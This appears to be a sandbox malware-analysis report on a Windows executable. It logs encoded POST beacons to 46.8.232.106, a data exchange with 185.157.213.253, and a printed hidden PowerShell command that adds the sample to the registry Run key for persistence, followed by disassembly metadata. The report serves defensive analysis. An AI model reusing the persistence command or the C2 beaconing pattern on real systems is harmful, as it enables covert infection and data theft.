                                    Data Raw: 31 38 35 2e 31 35 37 2e 32 31 33 2e 32 35 33 3b 32 32 31 33 32 3b 68 64 50 6f 74 72 59 4d 74 4e 4c 73 70 44 4c 32 3a 34 4a 49 2f 67 67 41 2f 78 63 6d 34 66 71 52 36 69 6a 71 2e 39 6a 75 38 4c 48 43 2e 6a 6d 51 32 41 58 72 33 36 48 6a 32 71 30 32 2e 56 36 34 31 54 55 38 30 50 54 30 36 46 57 46 2c 39 33 72 68 74 46 62 74 4c 47 7a 74 34 70 4a 70 68 55 65 3a 52 79 39 2f 57 79 76 2f 6d 57 30 34 31 46 4f 36 36 41 52 2e 77 59 51 38 79 39 39 2e 79 41 49 32 68 4e 51 33 67 61 4c 36 73 39 41 2e 74 52 53 36 30 76 53 31 6c 77 63 2c 50 71 73 68 48 38 56 74 49 5a 34 74 72 4b 52 70 54 66 52 3a 63 51 38 2f 63 41 4a 2f 69 53 73 39 64 6b 33 31 55 48 48 2e 69 6d 56 32 77 53 6a 31 4f 46 4d 32 32 7a 48 2e 52 30 57 31 55 5a 72 36 79 4d 48 36 36 61 75 2e 58 5a 6c 39 6a 42 78 31 36 79 57 2c 59 6b 42 68 35 45 4d 74 78 33 35 74 59 37 78 70 5a 51 36 3a 70 47 70 2f 59 53 6a 2f 32 47 4c 33 62 58 47 38 57 51 4c 2e 33 52 73 31 71 58 41 38 52 42 46 30 5a 31 48 2e 31 75 4a 32 54 61 7a 30 6b 30 71 35 42 44 76 2e 78 77 61 31 59 79 34 [TRUNCATED]
                                    Data Ascii: 185.157.213.253;22132;hdPotrYMtNLspDL2:4JI/ggA/xcm4fqR6ijq.9ju8LHC.jmQ2AXr36Hj2q02.V641TU80PT06FWF,93rhtFbtLGzt4pJphUe:Ry9/Wyv/mW041FO66AR.wYQ8y99.yAI2hNQ3gaL6s9A.tRS60vS1lwc,PqshH8VtIZ4trKRpTfR:cQ8/cAJ/iSs9dk31UHH.imV2wSj1OFM22zH.R0W1UZr6yMH66au.XZl9jBx16yW,YkBh5EMtx35tY7xpZQ6:pGp/YSj/2GL3bXG8WQL.3Rs1qXA8RBF0Z1H.1uJ2Taz0k0q5BDv.xwa1Yy46M7M4Xj7,iV0hyZstdzAtbDQpNMe:psb/ZND/w389qit1EUG.vxv2sy315wI2o7S.ik41fIY6Ylx6ATP.Wl09cpV,fDths4UtNjIt1hkpnHo:T4W/vH5/4Fx1ukA4CI77CfF.onm44ju59WG.QYa1SpC9xxA6Rss.fP41py65BkQ7SqX
                                    Jan 1, 2025 17:03:14.366863012 CET6OUTData Raw: 00
                                    Data Ascii:
                                    Jan 1, 2025 17:03:44.462758064 CET6OUTData Raw: 00
                                    Data Ascii:


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1192.168.2.55922846.8.232.10680
                                    TimestampBytes transferredDirectionData
                                    Jan 1, 2025 17:04:18.093914032 CET314OUTPOST / HTTP/1.1
                                    Host: 46.8.232.106
                                    User-Agent: Go-http-client/1.1
                                    Content-Length: 178
                                    X-Api-Key: ut5yhs9h
                                    Accept-Encoding: gzip
                                    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 34 05 0d 16 07 23 11 16 02 2f 30 08 0e 22 29 2a 0a 0a 01 10 06 14 54 58 09 54 36 00 07 38 56 52 0b 59 50 24 0e 04 20 1c 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2c 2f 01 09 1b 3e 07 2d 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 0a 1f 16 5e 26 07 23 25 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 26 36 39 41 2d 5e 3a 54 29 04 09 44 45 45 0e 0b 5b 44 53 45 57 5c 5f 52 5b 52 56 5d 0b 52 51 56 51 0a 5d 55 5a 50 51 5d 58 05 08 56 55 59 5a 03 0d 50 51 57 4c 1b
                                    Data Ascii: M*L\K4#/0")*TXT68VRYP$ DEE2MTD,/>-ACL>K]A^&#%DEE1AULV&69A-^:T)DEE[DSEW\_R[RV]RQVQ]UZPQ]XVUYZPQWL
                                    Jan 1, 2025 17:04:19.281573057 CET165INHTTP/1.1 429 Too Many Requests
                                    Content-Type: text/plain; charset=utf-8
                                    X-Content-Type-Options: nosniff
                                    Date: Wed, 01 Jan 2025 16:04:19 GMT
                                    Content-Length: 1
                                    Data Raw: 0a
                                    Data Ascii:


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2192.168.2.55922946.8.232.10680
                                    TimestampBytes transferredDirectionData
                                    Jan 1, 2025 17:04:18.135109901 CET314OUTPOST / HTTP/1.1
                                    Host: 46.8.232.106
                                    User-Agent: Go-http-client/1.1
                                    Content-Length: 178
                                    X-Api-Key: pH40oZCj
                                    Accept-Encoding: gzip
                                    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 34 05 0d 16 07 23 11 16 02 2f 30 08 0e 22 29 2a 0a 0a 01 10 06 14 54 58 09 54 36 00 07 38 56 52 0b 59 50 24 0e 04 20 1c 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2c 2f 01 09 1b 3e 07 2d 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 0a 1f 16 5e 26 07 23 25 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 26 36 39 41 2d 5e 3a 54 29 04 09 44 45 45 0e 0b 5b 44 53 45 57 5c 5f 52 5b 52 56 5d 0b 52 51 56 51 0a 5d 55 5a 50 51 5d 58 05 08 56 55 59 5a 03 0d 50 51 57 4c 1b
                                    Data Ascii: M*L\K4#/0")*TXT68VRYP$ DEE2MTD,/>-ACL>K]A^&#%DEE1AULV&69A-^:T)DEE[DSEW\_R[RV]RQVQ]UZPQ]XVUYZPQWL
                                    Jan 1, 2025 17:04:19.008264065 CET165INHTTP/1.1 429 Too Many Requests
                                    Content-Type: text/plain; charset=utf-8
                                    X-Content-Type-Options: nosniff
                                    Date: Wed, 01 Jan 2025 16:04:18 GMT
                                    Content-Length: 1
                                    Data Raw: 0a
                                    Data Ascii:


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:11:01:10
                                    Start date:01/01/2025
                                    Path:C:\Users\user\Desktop\lDO4WBEQyL.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\lDO4WBEQyL.exe"
                                    Imagebase:0xf80000
                                    File size:8'812'032 bytes
                                    MD5 hash:43142552E4812E3337226CA1664ED728
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:4
                                    Start time:11:02:30
                                    Start date:01/01/2025
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"
                                    Imagebase:0x380000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:11:02:30
                                    Start date:01/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:11:02:42
                                    Start date:01/01/2025
                                    Path:C:\Users\user\Desktop\lDO4WBEQyL.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\lDO4WBEQyL.exe"
                                    Imagebase:0xf80000
                                    File size:8'812'032 bytes
                                    MD5 hash:43142552E4812E3337226CA1664ED728
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:7
                                    Start time:11:02:50
                                    Start date:01/01/2025
                                    Path:C:\Users\user\Desktop\lDO4WBEQyL.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\lDO4WBEQyL.exe"
                                    Imagebase:0xf80000
                                    File size:8'812'032 bytes
                                    MD5 hash:43142552E4812E3337226CA1664ED728
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:8
                                    Start time:11:04:09
                                    Start date:01/01/2025
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"
                                    Imagebase:0x380000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:9
                                    Start time:11:04:09
                                    Start date:01/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:0.2%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:12.5%
                                      Total number of Nodes:8
                                      Total number of Limit Nodes:0

                                      Callgraph

                                      Non-executed Functions

                                      Function 00FB75F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2 fb75f0-fb765a call fe7200 call fb7590 call fb7f30 9 fb778d-fb7794 2->9 10 fb7660-fb768a 2->10 11 fb77b3-fb77b9 9->11 12 fb7796-fb77af call fb7f10 9->12 15 fb778b 10->15 16 fb7690-fb76b3 10->16 17 fb77cb-fb77d1 11->17 18 fb77bb-fb77c8 call fb7590 11->18 12->11 15->11 20 fb76b9-fb76cf call fb7eb0 16->20 21 fb7786 16->21 18->17 26 fb76e2-fb76e6 20->26 27 fb76d1-fb76d8 20->27 21->15 26->21 28 fb76ec-fb76f5 26->28 27->15 29 fb772f-fb7746 call fb7ef0 28->29 30 fb76f7-fb76fe 28->30 35 fb7748-fb775a call fb7f10 29->35 36 fb775f-fb7781 call fb7590 call fb7ed0 29->36 30->29 31 fb7700-fb770f call fe6900 30->31 31->29 40 fb7711-fb772c 31->40 35->36 36->21 40->29
                                      APIs
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB763D
                                      • ___except_validate_context_record.LIBVCRUNTIMED ref: 00FB7649
                                        • Part of subcall function 00FB7F30: __guard_icall_checks_enforced.LIBCMTD ref: 00FB7F36
                                      • __IsNonwritableInCurrentImage.LIBCMTD ref: 00FB7705
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB7770
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB77C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3892170315.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                      • Associated: 00000000.00000002.3892145170.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3892223380.0000000000FE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3892249241.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3892279336.0000000000FFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3892279336.00000000015DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3893155356.00000000017D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f80000_lDO4WBEQyL.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record__guard_icall_checks_enforced
                                      • String ID: csm
                                      • API String ID: 3439031638-1018135373
                                      • Opcode ID: 7700004d401bc58c1093de646d3ccb7ecb7a888f0a4c5c90d6b81c62bd609edb
                                      • Instruction ID: 3d2bb04ed07324369c961641135a7ff5d47e29d20eef1e11b940c22da20220e2
                                      • Opcode Fuzzy Hash: 7700004d401bc58c1093de646d3ccb7ecb7a888f0a4c5c90d6b81c62bd609edb
                                      • Instruction Fuzzy Hash: F3510E74D042099FCB04EF95D881AEEBBB1BF88314F248158E5156B351DB35AA41DFA1

                                      Executed Functions

                                      Function 02D57A71 Relevance: .6, Instructions: 565COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2943057437.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_2d50000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e5a5e9f5b8a3006978ef3d722c81c7dc46a6bb61797add54526740ca26f114f2
                                      • Instruction ID: 6bc4d7745719c53feca5ebf7f1dc5de9156b13e4441b1ecae5dc074b0afe6169
                                      • Opcode Fuzzy Hash: e5a5e9f5b8a3006978ef3d722c81c7dc46a6bb61797add54526740ca26f114f2
                                      • Instruction Fuzzy Hash: 4D210835B001549FDB08DFA9D58099DFBF2AF88310B25C1A5E905AB365CB35ED45CB90
                                      Function 02D56DE8 Relevance: .3, Instructions: 273COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2943057437.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_2d50000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3783176cd9af1c88bcf7ad3b230fda15833ec2c39f54815a5e04f14e33de5fd3
                                      • Instruction ID: d56920caa5c7d02e920022ad3cf4653d77f835be2efcb8d73a1ab875a48f05dc
                                      • Opcode Fuzzy Hash: 3783176cd9af1c88bcf7ad3b230fda15833ec2c39f54815a5e04f14e33de5fd3
                                      • Instruction Fuzzy Hash: 29B1AE34A052549FCB15CFA8D484AAEFBF6FF89310F1484A9E8459B362C775ED41CBA0
                                      Function 02D52AA0 Relevance: .2, Instructions: 213COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2943057437.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_2d50000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c01bb13920e502fae359d30f4aceb49b253685b0e723537759acd9bc9037660f
                                      • Instruction ID: 39ff9d2ad0db2929968b0568d6f9bf926ac158c5c3314e0b9b0ccb38e10570d9
                                      • Opcode Fuzzy Hash: c01bb13920e502fae359d30f4aceb49b253685b0e723537759acd9bc9037660f
                                      • Instruction Fuzzy Hash: 10916A70A006199FCB05CF58C594AAEFBF1FF88314B25865AD855AB3A5C732FC51CBA0
                                      Function 02D52BB0 Relevance: .1, Instructions: 106COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2943057437.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_2d50000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 56bbe9c1be7c43e193e83d7cc5d44aed799e7b7b4ff8f4bebe8f0d39c33d523b
                                      • Instruction ID: 0d7319f0eb76e25b582b3ea27a1a6ca2375e6086c990fc1db4a253dd3f836c2e
                                      • Opcode Fuzzy Hash: 56bbe9c1be7c43e193e83d7cc5d44aed799e7b7b4ff8f4bebe8f0d39c33d523b
                                      • Instruction Fuzzy Hash: 9A411574A005199FCB09CF58C598ABAFBB1FF48314B11825ADC16AB365C732FC91CBA4
                                      Function 02D57AA4 Relevance: .0, Instructions: 47COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2943057437.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_2d50000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 642e0f85c58fa1180c7bee94bd5039223e44c2d45146ef2fde71f62f08ecb6e5
                                      • Instruction ID: b6db3488473a3704d9dc42b895f1595398d4bf67ca5995f58d9d816c93e1662e
                                      • Opcode Fuzzy Hash: 642e0f85c58fa1180c7bee94bd5039223e44c2d45146ef2fde71f62f08ecb6e5
                                      • Instruction Fuzzy Hash: FB11E275A006189FDB04CFA9E68099DFBF6FF88710F2581A5E808AB315C735ED85CB90
                                      Function 02AFD006 Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2942718506.0000000002AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_2afd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0381a07c885ebd7ea66c384f171dc84fcf1a991f3e91943d4a124884ed6b3334
                                      • Instruction ID: 1d379f9794bb278b998d3652fc6165860c26491375ba5d86335f999ba7ba8971
                                      • Opcode Fuzzy Hash: 0381a07c885ebd7ea66c384f171dc84fcf1a991f3e91943d4a124884ed6b3334
                                      • Instruction Fuzzy Hash: 9301407100E7C49ED7138B258894752BFB4DF47224F1D80DBE9888F5A3C2695849C772
                                      Function 02AFD01D Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2942718506.0000000002AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_2afd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e5b3aa4461d5a79094fb0da2a2498cee3b7e7ac9b31d2161e210001749c6c83
                                      • Instruction ID: 12e80c7fe2c77a91648b2a849c111c0b9f293bff768745111378b893a2d34d86
                                      • Opcode Fuzzy Hash: 5e5b3aa4461d5a79094fb0da2a2498cee3b7e7ac9b31d2161e210001749c6c83
                                      • Instruction Fuzzy Hash: 05012B71005B049AD7618B55CDC4B67BFDCEF46364F18C42AFE4A0B646CB7D9841C6B1

                                      Execution Graph

                                      Execution Coverage:0.2%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:8
                                      Total number of Limit Nodes:0

                                      Callgraph

                                      Non-executed Functions

                                      Function 00FB75F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2 fb75f0-fb765a call fe7200 call fb7590 call fb7f30 9 fb778d-fb7794 2->9 10 fb7660-fb768a 2->10 11 fb77b3-fb77b9 9->11 12 fb7796-fb77af call fb7f10 9->12 15 fb778b 10->15 16 fb7690-fb76b3 10->16 17 fb77cb-fb77d1 11->17 18 fb77bb-fb77c8 call fb7590 11->18 12->11 15->11 21 fb76b9-fb76cf call fb7eb0 16->21 22 fb7786 16->22 18->17 26 fb76e2-fb76e6 21->26 27 fb76d1-fb76d8 21->27 22->15 26->22 28 fb76ec-fb76f5 26->28 27->15 29 fb772f-fb7746 call fb7ef0 28->29 30 fb76f7-fb76fe 28->30 35 fb7748-fb775a call fb7f10 29->35 36 fb775f-fb7781 call fb7590 call fb7ed0 29->36 30->29 31 fb7700-fb770f call fe6900 30->31 31->29 40 fb7711-fb772c 31->40 35->36 36->22 40->29
                                      APIs
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB763D
                                      • ___except_validate_context_record.LIBVCRUNTIMED ref: 00FB7649
                                        • Part of subcall function 00FB7F30: __guard_icall_checks_enforced.LIBCMTD ref: 00FB7F36
                                      • __IsNonwritableInCurrentImage.LIBCMTD ref: 00FB7705
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB7770
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB77C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3891792398.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                      • Associated: 00000006.00000002.3891757746.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000006.00000002.3891876839.0000000000FE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000006.00000002.3891922729.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000006.00000002.3891955963.0000000000FFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000006.00000002.3891955963.00000000015DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000006.00000002.3892741493.00000000017D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_f80000_lDO4WBEQyL.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record__guard_icall_checks_enforced
                                      • String ID: csm
                                      • API String ID: 3439031638-1018135373
                                      • Opcode ID: 7700004d401bc58c1093de646d3ccb7ecb7a888f0a4c5c90d6b81c62bd609edb
                                      • Instruction ID: 3d2bb04ed07324369c961641135a7ff5d47e29d20eef1e11b940c22da20220e2
                                      • Opcode Fuzzy Hash: 7700004d401bc58c1093de646d3ccb7ecb7a888f0a4c5c90d6b81c62bd609edb
                                      • Instruction Fuzzy Hash: F3510E74D042099FCB04EF95D881AEEBBB1BF88314F248158E5156B351DB35AA41DFA1

                                      Execution Graph

                                      Execution Coverage:0.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:8
                                      Total number of Limit Nodes:0

                                      Callgraph

                                      Non-executed Functions

                                      Function 00FB75F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2 fb75f0-fb765a call fe7200 call fb7590 call fb7f30 9 fb778d-fb7794 2->9 10 fb7660-fb768a 2->10 11 fb77b3-fb77b9 9->11 12 fb7796-fb77af call fb7f10 9->12 15 fb778b 10->15 16 fb7690-fb76b3 10->16 17 fb77cb-fb77d1 11->17 18 fb77bb-fb77c8 call fb7590 11->18 12->11 15->11 20 fb76b9-fb76cf call fb7eb0 16->20 21 fb7786 16->21 18->17 26 fb76e2-fb76e6 20->26 27 fb76d1-fb76d8 20->27 21->15 26->21 28 fb76ec-fb76f5 26->28 27->15 29 fb772f-fb7746 call fb7ef0 28->29 30 fb76f7-fb76fe 28->30 36 fb7748-fb775a call fb7f10 29->36 37 fb775f-fb7781 call fb7590 call fb7ed0 29->37 30->29 31 fb7700-fb770f call fe6900 30->31 31->29 38 fb7711-fb772c 31->38 36->37 37->21 38->29
                                      APIs
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB763D
                                      • ___except_validate_context_record.LIBVCRUNTIMED ref: 00FB7649
                                        • Part of subcall function 00FB7F30: __guard_icall_checks_enforced.LIBCMTD ref: 00FB7F36
                                      • __IsNonwritableInCurrentImage.LIBCMTD ref: 00FB7705
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB7770
                                      • _ValidateLocalCookies.LIBCMTD ref: 00FB77C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3891582007.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                      • Associated: 00000007.00000002.3891554049.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000007.00000002.3891662053.0000000000FE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000007.00000002.3891694965.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000007.00000002.3891720507.0000000000FFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000007.00000002.3892469331.00000000017D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000007.00000002.3892486429.00000000017D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_f80000_lDO4WBEQyL.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record__guard_icall_checks_enforced
                                      • String ID: csm
                                      • API String ID: 3439031638-1018135373
                                      • Opcode ID: 7700004d401bc58c1093de646d3ccb7ecb7a888f0a4c5c90d6b81c62bd609edb
                                      • Instruction ID: 3d2bb04ed07324369c961641135a7ff5d47e29d20eef1e11b940c22da20220e2
                                      • Opcode Fuzzy Hash: 7700004d401bc58c1093de646d3ccb7ecb7a888f0a4c5c90d6b81c62bd609edb
                                      • Instruction Fuzzy Hash: F3510E74D042099FCB04EF95D881AEEBBB1BF88314F248158E5156B351DB35AA41DFA1